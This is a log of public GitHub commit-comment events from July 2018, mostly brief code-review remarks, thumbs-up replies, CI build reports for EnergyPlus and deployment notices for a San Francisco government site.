{"id":"7929568108","type":"CommitCommentEvent","actor":{"login":"lolvagy01"},"repo":{"name":"lolvagy01/teamgetrekt-bot"},"payload":{"comment":{"id":29622982,"position":null,"line":null,"path":null,"commit_id":"8be5191ceef16a6e08269c635b9fd7c99dae2402","created_at":"2018-07-06T15:29:34Z","updated_at":"2018-07-06T15:29:34Z","author_association":"OWNER","body":"asd"}},"created_at":"2018-07-06T15:29:34Z"}
{"id":"7929568245","type":"CommitCommentEvent","actor":{"login":"VadymSV"},"repo":{"name":"Appboy/appboy-xamarin-bindings"},"payload":{"comment":{"id":29622983,"position":10,"line":7,"path":"appboy-component/samples/android/TestApp.XamarinAndroid/Properties/AndroidManifest.xml","commit_id":"890557c894b16b218bdf3878b6285c38c4b0db3f","created_at":"2018-07-06T15:29:36Z","updated_at":"2018-07-06T15:29:36Z","author_association":"NONE","body":"I understand. Thanks.\r\nA bit confusing name. It would be great to rename it in future."}},"created_at":"2018-07-06T15:29:36Z"}
{"id":"7929569086","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"k-staple/slack-flattery"},"payload":{"comment":{"id":29622984,"position":null,"line":null,"path":null,"commit_id":"281d27cb517456f2462d6415342018c4d4332699","created_at":"2018-07-06T15:29:46Z","updated_at":"2018-07-06T15:29:46Z","author_association":"NONE","body":"Good job using CSS in JS."}},"created_at":"2018-07-06T15:29:46Z"}
{"id":"7929570005","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"k-staple/slack-flattery"},"payload":{"comment":{"id":29622985,"position":null,"line":null,"path":null,"commit_id":"d6878cb10707ba30e1d29a65fde6063dbac52fff","created_at":"2018-07-06T15:29:57Z","updated_at":"2018-07-06T15:29:57Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T15:29:57Z"}
{"id":"7929571174","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"k-staple/slack-flattery"},"payload":{"comment":{"id":29622992,"position":null,"line":null,"path":null,"commit_id":"5f2e48573f057f4a76d34719297e9655dee5b4ba","created_at":"2018-07-06T15:30:12Z","updated_at":"2018-07-06T15:30:12Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T15:30:12Z"}
{"id":"7929572655","type":"CommitCommentEvent","actor":{"login":"bartavelle"},"repo":{"name":"bartavelle/language-puppet"},"payload":{"comment":{"id":29622995,"position":null,"line":null,"path":null,"commit_id":"dda552c7e602661c5b9700229cfb4dee6cac7452","created_at":"2018-07-06T15:30:28Z","updated_at":"2018-07-06T15:30:28Z","author_association":"OWNER","body":"Yeah I am still using it :("}},"created_at":"2018-07-06T15:30:28Z"}
{"id":"7929572865","type":"CommitCommentEvent","actor":{"login":"vilchik-elena"},"repo":{"name":"SonarSource/slang"},"payload":{"comment":{"id":29622996,"position":14,"line":222,"path":"slang-antlr/src/main/antlr4/com/sonarsource/slang/parser/SLang.g4","commit_id":"5775a6dded2dffa905b1475a99a10eb3eb2d49e7","created_at":"2018-07-06T15:30:31Z","updated_at":"2018-07-06T15:30:31Z","author_association":"CONTRIBUTOR","body":"Since you explained me the way loops are done and we decided to keep single `JumpTree` I think it's better to keep `JumpExpression` in Slang grammar"}},"created_at":"2018-07-06T15:30:31Z"}
{"id":"7929575653","type":"CommitCommentEvent","actor":{"login":"hammxah"},"repo":{"name":"hammxah/University"},"payload":{"comment":{"id":29623000,"position":null,"line":null,"path":null,"commit_id":"83d685594677ff32c92e06816e23c89ac170df10","created_at":"2018-07-06T15:31:03Z","updated_at":"2018-07-06T15:31:03Z","author_association":"OWNER","body":"delete"}},"created_at":"2018-07-06T15:31:03Z"}
{"id":"7929577977","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"keerko2218/chatarang"},"payload":{"comment":{"id":29623008,"position":null,"line":null,"path":null,"commit_id":"251ea97f698b6455955540b5f391adfb90944cf2","created_at":"2018-07-06T15:31:28Z","updated_at":"2018-07-06T15:31:28Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T15:31:28Z"}
{"id":"7929580224","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"keerko2218/chatarang"},"payload":{"comment":{"id":29623012,"position":null,"line":null,"path":null,"commit_id":"a193e530319e86149e08200cce037c90b817291f","created_at":"2018-07-06T15:31:55Z","updated_at":"2018-07-06T15:31:55Z","author_association":"NONE","body":"You commit messages should be in present tense. For example, \"Add styling\" instead of \"Added styling.\" "}},"created_at":"2018-07-06T15:31:55Z"}
{"id":"7929581978","type":"CommitCommentEvent","actor":{"login":"markjd84"},"repo":{"name":"IntegratedTransportPlanning/gcvt"},"payload":{"comment":{"id":29623013,"position":8,"line":15,"path":"R/od_viewer/app.R","commit_id":"532dab06116131da6a6e860f9d5ad945580728e5","created_at":"2018-07-06T15:32:17Z","updated_at":"2018-07-06T15:32:17Z","author_association":"CONTRIBUTOR","body":"Oops - thought I'd put that in the other file. Ok I'll remove and recommit. Not worth removing the commit for! "}},"created_at":"2018-07-06T15:32:17Z"}
{"id":"7929582868","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"keerko2218/chatarang"},"payload":{"comment":{"id":29623015,"position":null,"line":null,"path":null,"commit_id":"943e489afdbeee1511d10a84f093d48bddcc1908","created_at":"2018-07-06T15:32:27Z","updated_at":"2018-07-06T15:32:27Z","author_association":"NONE","body":"This is a huge commit! Try breaking them up into smaller commits so it's easier to refer back to in the future."}},"created_at":"2018-07-06T15:32:27Z"}
{"id":"7929583302","type":"CommitCommentEvent","actor":{"login":"miker"},"repo":{"name":"freenas/freenas-docs"},"payload":{"comment":{"id":29623017,"position":259,"line":726,"path":"userguide/jails.rst","commit_id":"44aeb762d62168c8d8aa6c1a06856b64c0ea03a4","created_at":"2018-07-06T15:32:32Z","updated_at":"2018-07-06T15:32:32Z","author_association":"CONTRIBUTOR","body":"According to the Docs Team Handbook, wrapped text should start under the first letter of the callout type. (the n in note and the w in warning)"}},"created_at":"2018-07-06T15:32:32Z"}
{"id":"7929588608","type":"CommitCommentEvent","actor":{"login":"pbsds"},"repo":{"name":"WORD559/Hatenatools"},"payload":{"comment":{"id":29623038,"position":null,"line":null,"path":null,"commit_id":"17085f316b1f2fceaa23a6e2cc8dc4e28bb3d6f8","created_at":"2018-07-06T15:33:34Z","updated_at":"2018-07-06T15:33:34Z","author_association":"NONE","body":"I took a lot of flipnote files and extracted the decoded background sound and the number of frames.\r\n\r\nThen i divided number of frames by the length of the background sound(measured in samples).\r\n\r\nTo account for the flipnote files where the bgm is either shorter or longer than length of the flipnote, i filtered out the outliers and focused the mode value."}},"created_at":"2018-07-06T15:33:34Z"}
{"id":"7929591401","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29623047,"position":27,"line":57,"path":"examples_tests/28.Benchmark/main.cpp","commit_id":"94dd90656e9c7d6044f4cf6b737811179463b897","created_at":"2018-07-06T15:34:08Z","updated_at":"2018-07-06T15:34:08Z","author_association":"NONE","body":"what about an attribute divisor of 1 ?"}},"created_at":"2018-07-06T15:34:08Z"}
{"id":"7929591495","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29623048,"position":null,"line":null,"path":null,"commit_id":"8781f967f577842f63e2751b455680bedd11d3c1","created_at":"2018-07-06T15:34:09Z","updated_at":"2018-07-06T15:34:09Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-743](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-743).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-743-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-06T15:34:09Z"}
{"id":"7929596634","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"kmjanis/chatarang"},"payload":{"comment":{"id":29623059,"position":null,"line":null,"path":null,"commit_id":"09c0f86ecde4fb1d194597dafcdf9acb95ceff19","created_at":"2018-07-06T15:35:12Z","updated_at":"2018-07-06T15:35:12Z","author_association":"NONE","body":"It's convention to capitalize the first work in your commit message. Try making that change! Otherwise, good work! "}},"created_at":"2018-07-06T15:35:12Z"}
{"id":"7929598068","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29623064,"position":null,"line":null,"path":null,"commit_id":"95b799d1b6a158a08a39852d4001b79422b14956","created_at":"2018-07-06T15:35:29Z","updated_at":"2018-07-06T15:35:29Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-744](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-744).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-744-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-06T15:35:29Z"}
{"id":"7929599195","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"kmjanis/chatarang"},"payload":{"comment":{"id":29623069,"position":null,"line":null,"path":null,"commit_id":"f1783c35596cc3d360dd2fcbed12b917849ac39c","created_at":"2018-07-06T15:35:43Z","updated_at":"2018-07-06T15:35:43Z","author_association":"NONE","body":"Good job using CSS in JS."}},"created_at":"2018-07-06T15:35:43Z"}
{"id":"7929601194","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"kmjanis/chatarang"},"payload":{"comment":{"id":29623078,"position":null,"line":null,"path":null,"commit_id":"7b59a775cfe4ee1e2ef3d0d731c1ecb742055c16","created_at":"2018-07-06T15:36:07Z","updated_at":"2018-07-06T15:36:07Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T15:36:07Z"}
{"id":"7929602697","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29623085,"position":89,"line":183,"path":"examples_tests/28.Benchmark/main.cpp","commit_id":"94dd90656e9c7d6044f4cf6b737811179463b897","created_at":"2018-07-06T15:36:24Z","updated_at":"2018-07-06T15:36:24Z","author_association":"NONE","body":"repeat the wait until success, thats the logically correct way to make sure GPU finishes with old data"}},"created_at":"2018-07-06T15:36:24Z"}
{"id":"7929606625","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29623090,"position":110,"line":204,"path":"examples_tests/28.Benchmark/main.cpp","commit_id":"94dd90656e9c7d6044f4cf6b737811179463b897","created_at":"2018-07-06T15:37:10Z","updated_at":"2018-07-06T15:37:10Z","author_association":"NONE","body":"this whole scope is useless, please remove it"}},"created_at":"2018-07-06T15:37:10Z"}
{"id":"7929610604","type":"CommitCommentEvent","actor":{"login":"halfbytecode"},"repo":{"name":"m0m4x/AdvDataPlan"},"payload":{"comment":{"id":29623095,"position":267,"line":675,"path":"app/src/main/java/net/m0m4x/android/xposed/advdataplan/HookMain.java","commit_id":"97f1f9fad4fe1f0ae6a6ddecf8148077fcf1ecea","created_at":"2018-07-06T15:37:58Z","updated_at":"2018-07-06T15:37:58Z","author_association":"NONE","body":"Typo. 26 should be 25."}},"created_at":"2018-07-06T15:37:58Z"}
{"id":"7929614795","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"KendallNicholson316/chatty"},"payload":{"comment":{"id":29623111,"position":null,"line":null,"path":null,"commit_id":"c25ccd6ea6499a905282affe8474fdfbe1a1cc9f","created_at":"2018-07-06T15:38:51Z","updated_at":"2018-07-06T15:38:51Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T15:38:51Z"}
{"id":"7929616919","type":"CommitCommentEvent","actor":{"login":"mreese84"},"repo":{"name":"nasa/earthdata-search"},"payload":{"comment":{"id":29623115,"position":5,"line":33,"path":"app/assets/stylesheets/modules/modal.css.scss","commit_id":"2f11893332718f2d7d87b64a3fd5a37895b89eea","created_at":"2018-07-06T15:39:17Z","updated_at":"2018-07-06T15:39:17Z","author_association":"COLLABORATOR","body":"Unnecessary line return here."}},"created_at":"2018-07-06T15:39:17Z"}
{"id":"7929620444","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"KendallNicholson316/chatty"},"payload":{"comment":{"id":29623122,"position":null,"line":null,"path":null,"commit_id":"7fb1add9f0642506a3b3a15ebb71a2519adc2ae0","created_at":"2018-07-06T15:40:01Z","updated_at":"2018-07-06T15:40:01Z","author_association":"NONE","body":"This commit is pretty big! Try committing more often so it's easier to go back and review smaller chunks of code! Otherwise, good work!"}},"created_at":"2018-07-06T15:40:01Z"}
{"id":"7929621383","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"KendallNicholson316/chatty"},"payload":{"comment":{"id":29623128,"position":null,"line":null,"path":null,"commit_id":"28cf5a0b7d0d1e59da2e2b5114768612e0900942","created_at":"2018-07-06T15:40:13Z","updated_at":"2018-07-06T15:40:13Z","author_association":"NONE","body":"Good job using CSS in JS."}},"created_at":"2018-07-06T15:40:13Z"}
{"id":"7929622836","type":"CommitCommentEvent","actor":{"login":"mreese84"},"repo":{"name":"nasa/earthdata-search"},"payload":{"comment":{"id":29623133,"position":39,"line":82,"path":"app/assets/stylesheets/modules/modal.css.scss","commit_id":"2f11893332718f2d7d87b64a3fd5a37895b89eea","created_at":"2018-07-06T15:40:30Z","updated_at":"2018-07-06T15:40:30Z","author_association":"COLLABORATOR","body":"There's no other way to get this positioning without using absolute? I always get a little nervous using/seeing \"absolute\"."}},"created_at":"2018-07-06T15:40:30Z"}
{"id":"7929622954","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"KendallNicholson316/chatty"},"payload":{"comment":{"id":29623134,"position":null,"line":null,"path":null,"commit_id":"acb7fd18e6ac09bc833bdc09be5a3ebf4a2a62c0","created_at":"2018-07-06T15:40:31Z","updated_at":"2018-07-06T15:40:31Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T15:40:31Z"}
{"id":"7929623073","type":"CommitCommentEvent","actor":{"login":"nlct"},"repo":{"name":"cereda/arara"},"payload":{"comment":{"id":29623135,"position":18,"line":169,"path":"docs/chapters/rules.tex","commit_id":"f533df30fac00df79fa6a1885f07698a5e3a1d3b","created_at":"2018-07-06T15:40:33Z","updated_at":"2018-07-06T15:40:33Z","author_association":"COLLABORATOR","body":"Thanks :smile: "}},"created_at":"2018-07-06T15:40:33Z"}
{"id":"7929623898","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"KendallNicholson316/chatty"},"payload":{"comment":{"id":29623137,"position":null,"line":null,"path":null,"commit_id":"92bc0de85d0505a90a128b57ee366a9dac8e041e","created_at":"2018-07-06T15:40:43Z","updated_at":"2018-07-06T15:40:43Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T15:40:43Z"}
{"id":"7929624333","type":"CommitCommentEvent","actor":{"login":"Bucimis"},"repo":{"name":"Appboy/appboy-xamarin-bindings"},"payload":{"comment":{"id":29623140,"position":10,"line":7,"path":"appboy-component/samples/android/TestApp.XamarinAndroid/Properties/AndroidManifest.xml","commit_id":"890557c894b16b218bdf3878b6285c38c4b0db3f","created_at":"2018-07-06T15:40:48Z","updated_at":"2018-07-06T15:40:48Z","author_association":"COLLABORATOR","body":"+1, we'll be renaming it when we fully remove GCM support"}},"created_at":"2018-07-06T15:40:48Z"}
{"id":"7929624605","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"KendallNicholson316/chatty"},"payload":{"comment":{"id":29623141,"position":null,"line":null,"path":null,"commit_id":"6e4c386159084525fd803e67a3efa273ae3849ec","created_at":"2018-07-06T15:40:51Z","updated_at":"2018-07-06T15:40:51Z","author_association":"NONE","body":"Nice work! 👍 "}},"created_at":"2018-07-06T15:40:51Z"}
{"id":"7929626740","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29623151,"position":null,"line":null,"path":null,"commit_id":"48d79b6ec58c689b8f5d750b9ff537844115e556","created_at":"2018-07-06T15:41:17Z","updated_at":"2018-07-06T15:41:17Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-747](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-747).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-747-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-06T15:41:17Z"}
{"id":"7929628665","type":"CommitCommentEvent","actor":{"login":"VadymSV"},"repo":{"name":"Appboy/appboy-xamarin-bindings"},"payload":{"comment":{"id":29623156,"position":10,"line":7,"path":"appboy-component/samples/android/TestApp.XamarinAndroid/Properties/AndroidManifest.xml","commit_id":"890557c894b16b218bdf3878b6285c38c4b0db3f","created_at":"2018-07-06T15:41:41Z","updated_at":"2018-07-06T15:41:41Z","author_association":"NONE","body":"Cool. Thanks."}},"created_at":"2018-07-06T15:41:41Z"}
{"id":"7929629143","type":"CommitCommentEvent","actor":{"login":"goodvubo"},"repo":{"name":"goodvubo/ML"},"payload":{"comment":{"id":29623158,"position":null,"line":null,"path":null,"commit_id":"363b8d9ab6f32426535885763d40077e61c17629","created_at":"2018-07-06T15:41:49Z","updated_at":"2018-07-06T15:41:49Z","author_association":"OWNER","body":"playing tennis based on weather attributes"}},"created_at":"2018-07-06T15:41:49Z"}
{"id":"7929629570","type":"CommitCommentEvent","actor":{"login":"neumantm"},"repo":{"name":"AmyAssist/Amy"},"payload":{"comment":{"id":29623161,"position":22,"line":68,"path":"core/src/main/java/de/unistuttgart/iaas/amyassist/amy/core/pluginloader/PluginLoader.java","commit_id":"be94783458b8a91d3d4ab2e2f5f16e7ec7308da4","created_at":"2018-07-06T15:41:54Z","updated_at":"2018-07-06T15:41:54Z","author_association":"MEMBER","body":"But there is no good way to check if a path exists, other then converting it to a File. And instead of converting many paths to files for checking if they exist, it's easier to just work with Files, when you need to check that a lot."}},"created_at":"2018-07-06T15:41:54Z"}
{"id":"7929631467","type":"CommitCommentEvent","actor":{"login":"miker"},"repo":{"name":"freenas/freenas-docs"},"payload":{"comment":{"id":29623166,"position":301,"line":778,"path":"userguide/jails.rst","commit_id":"44aeb762d62168c8d8aa6c1a06856b64c0ea03a4","created_at":"2018-07-06T15:42:17Z","updated_at":"2018-07-06T15:42:17Z","author_association":"CONTRIBUTOR","body":"s/using %brand% UI :guilabel:`Shell`./using the %brand% :guilabel:`Shell`.\r\n\r\n\"...using FreeNAS UI Shell\" doesn't make sense to me. \"...using the TrueNAS Shell\" makes more sense."}},"created_at":"2018-07-06T15:42:17Z"}
{"id":"7929633067","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29623171,"position":null,"line":null,"path":null,"commit_id":"99f7582398748db7570e5e995137b8103b9d7ebd","created_at":"2018-07-06T15:42:38Z","updated_at":"2018-07-06T15:42:38Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2328 of 2329 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 644\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-99f7582398748db7570e5e995137b8103b9d7ebd-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-99f7582398748db7570e5e995137b8103b9d7ebd-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.png)</a> \n"}},"created_at":"2018-07-06T15:42:38Z"}
{"id":"7929633490","type":"CommitCommentEvent","actor":{"login":"kyao"},"repo":{"name":"usc-isi-i2/dsbox-ta2"},"payload":{"comment":{"id":29623173,"position":null,"line":null,"path":null,"commit_id":"3383c0b07617377137ee6aff8e70ac19dfdd9e3a","created_at":"2018-07-06T15:42:43Z","updated_at":"2018-07-06T15:42:43Z","author_association":"CONTRIBUTOR","body":"@serbanstan For the submission for evaluation the output directory is '/output'. For our internal usage, we are using config files to modify the location. "}},"created_at":"2018-07-06T15:42:43Z"}
{"id":"7929635355","type":"CommitCommentEvent","actor":{"login":"jukben"},"repo":{"name":"flextv/react-native-google-cast"},"payload":{"comment":{"id":29623174,"position":null,"line":null,"path":null,"commit_id":"b25daab8bb8bf2452d5d28495a8301e4bdf3e2a2","created_at":"2018-07-06T15:43:07Z","updated_at":"2018-07-06T15:43:07Z","author_association":"NONE","body":"I've run the test some time ago, but in my case, the `setRemoteIndicatorDrawable` has been called more than once thus there will be eventually defined `mColor`. I'm talking about simplest use case - first initialization of the Component, the second render was OK even with the old (buggy) behavior.\r\n\r\nCould you test it out this approach? I'm running this code in production so I'm almost 100% that it fixes this issue but honestly, I've ended up with this as a result of a similar hackathon as you did. Frankly, if we can avoid loop it would be nice. 👍 "}},"created_at":"2018-07-06T15:43:07Z"}
{"id":"7929636188","type":"CommitCommentEvent","actor":{"login":"neumantm"},"repo":{"name":"AmyAssist/Amy"},"payload":{"comment":{"id":29623178,"position":35,"line":63,"path":"core/src/test/java/de/unistuttgart/iaas/amyassist/amy/core/pluginloader/PluginManagerTest.java","commit_id":"be94783458b8a91d3d4ab2e2f5f16e7ec7308da4","created_at":"2018-07-06T15:43:17Z","updated_at":"2018-07-06T15:43:17Z","author_association":"MEMBER","body":"I don't think the directory is actually being used."}},"created_at":"2018-07-06T15:43:17Z"}
{"id":"7929636200","type":"CommitCommentEvent","actor":{"login":"vilchik-elena"},"repo":{"name":"SonarSource/slang"},"payload":{"comment":{"id":29623179,"position":35,"line":690,"path":"sonar-slang-plugin/src/test/java/com/sonarsource/slang/kotlin/KotlinConverterTest.java","commit_id":"5775a6dded2dffa905b1475a99a10eb3eb2d49e7","created_at":"2018-07-06T15:43:17Z","updated_at":"2018-07-06T15:43:17Z","author_association":"CONTRIBUTOR","body":"@andrea-guarino-sonarsource do we have asserting that it's native?"}},"created_at":"2018-07-06T15:43:17Z"}
{"id":"7929637437","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29623183,"position":null,"line":null,"path":null,"commit_id":"9be10bdbe52a081a5d0394b3a8646cfb346d0058","created_at":"2018-07-06T15:43:33Z","updated_at":"2018-07-06T15:43:33Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-748](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-748).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-748-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-06T15:43:33Z"}
{"id":"7929638887","type":"CommitCommentEvent","actor":{"login":"waldo1001"},"repo":{"name":"CloudReadySoftware/crs-al-language-extension"},"payload":{"comment":{"id":29623190,"position":null,"line":null,"path":null,"commit_id":"6dc2d184384190da1cdb5439d3747ba15d39bc00","created_at":"2018-07-06T15:43:51Z","updated_at":"2018-07-06T15:43:51Z","author_association":"CONTRIBUTOR","body":"Only \"beauty\" , no annoyance;-)"}},"created_at":"2018-07-06T15:43:51Z"}
{"id":"7929642670","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"snooplog4/chatarang"},"payload":{"comment":{"id":29623203,"position":null,"line":null,"path":null,"commit_id":"e1d80255201ce6ac0044decde6ea9b0040f40fd4","created_at":"2018-07-06T15:44:37Z","updated_at":"2018-07-06T15:44:37Z","author_association":"NONE","body":"Good work!"}},"created_at":"2018-07-06T15:44:37Z"}
{"id":"7929643718","type":"CommitCommentEvent","actor":{"login":"pranavthombare"},"repo":{"name":"PotatoDevices/device_oneplus_dumpling"},"payload":{"comment":{"id":29623207,"position":null,"line":null,"path":null,"commit_id":"3ebf7bb3ddb531567badf3e3ed0df24d3c79afb8","created_at":"2018-07-06T15:44:51Z","updated_at":"2018-07-06T15:44:51Z","author_association":"CONTRIBUTOR","body":"Ohk, will change that."}},"created_at":"2018-07-06T15:44:51Z"}
{"id":"7929644022","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"snooplog4/chatarang"},"payload":{"comment":{"id":29623208,"position":null,"line":null,"path":null,"commit_id":"e26daa7b00a7c7bd7c5e4c09fd2e6d1c0443e749","created_at":"2018-07-06T15:44:54Z","updated_at":"2018-07-06T15:44:54Z","author_association":"NONE","body":"Good job using CSS in JS."}},"created_at":"2018-07-06T15:44:54Z"}
{"id":"7929647964","type":"CommitCommentEvent","actor":{"login":"povver88"},"repo":{"name":"povver88/Site"},"payload":{"comment":{"id":29623221,"position":null,"line":null,"path":null,"commit_id":"082ba674aab0c71aa0f5f17985c70f3417e59788","created_at":"2018-07-06T15:45:42Z","updated_at":"2018-07-06T15:45:42Z","author_association":"OWNER","body":"why"}},"created_at":"2018-07-06T15:45:42Z"}
{"id":"7929648001","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29623222,"position":null,"line":null,"path":null,"commit_id":"aae388b45b15dd61bf1a1356c58b08321deee879","created_at":"2018-07-06T15:45:42Z","updated_at":"2018-07-06T15:45:42Z","author_association":"NONE","body":"#6750-Crash-when-no-control-zone-name-is-specified-for-Load-control-in-AirloopHVACUnitarySystem (rraustad) - Win64-Windows-7-VisualStudio-14: OK (2933 of 2933 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-aae388b45b15dd61bf1a1356c58b08321deee879-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-aae388b45b15dd61bf1a1356c58b08321deee879-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-06T15:45:42Z"}
{"id":"7929656135","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29623243,"position":null,"line":null,"path":null,"commit_id":"99f7582398748db7570e5e995137b8103b9d7ebd","created_at":"2018-07-06T15:47:24Z","updated_at":"2018-07-06T15:47:24Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-99f7582398748db7570e5e995137b8103b9d7ebd-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-06T15:47:24Z"}
{"id":"7929656348","type":"CommitCommentEvent","actor":{"login":"ywarnier"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":29623245,"position":null,"line":null,"path":null,"commit_id":"977184b87a491fd83b831d65830b4d47d0002dd3","created_at":"2018-07-06T15:47:27Z","updated_at":"2018-07-06T15:47:27Z","author_association":"MEMBER","body":":+1: "}},"created_at":"2018-07-06T15:47:27Z"}
{"id":"7929656692","type":"CommitCommentEvent","actor":{"login":"Wphelp98737"},"repo":{"name":"unreal4u/telegram-api"},"payload":{"comment":{"id":29623249,"position":null,"line":null,"path":null,"commit_id":"6eac664f2fb63e6a00e069ba299be0286678bdd3","created_at":"2018-07-06T15:47:31Z","updated_at":"2018-07-06T15:47:31Z","author_association":"NONE","body":"https://github.com/unreal4u/telegram-api/blob/cd0669a1f561acf38b8636f126071d7be5207b3d/.gitattributes"}},"created_at":"2018-07-06T15:47:31Z"}
{"id":"7929660046","type":"CommitCommentEvent","actor":{"login":"Wphelp98737"},"repo":{"name":"unreal4u/telegram-api"},"payload":{"comment":{"id":29623256,"position":null,"line":null,"path":null,"commit_id":"6eac664f2fb63e6a00e069ba299be0286678bdd3","created_at":"2018-07-06T15:48:12Z","updated_at":"2018-07-06T15:48:12Z","author_association":"NONE","body":"https://github.com/unreal4u/telegram-api/commit/6eac664f2fb63e6a00e069ba299be0286678bdd3#diff-fc723d30b02a4cca7a534518111c1a66"}},"created_at":"2018-07-06T15:48:12Z"}
{"id":"7929665878","type":"CommitCommentEvent","actor":{"login":"afck"},"repo":{"name":"poanetwork/hbbft"},"payload":{"comment":{"id":29623272,"position":7,"line":141,"path":"src/agreement/mod.rs","commit_id":"81cb66a87979e28ac91f005e58d3dac9efdf8251","created_at":"2018-07-06T15:49:22Z","updated_at":"2018-07-06T15:49:22Z","author_association":"CONTRIBUTOR","body":"Is the distinction between `NotInitialized` and `Initialized` relevant to the user?"}},"created_at":"2018-07-06T15:49:22Z"}
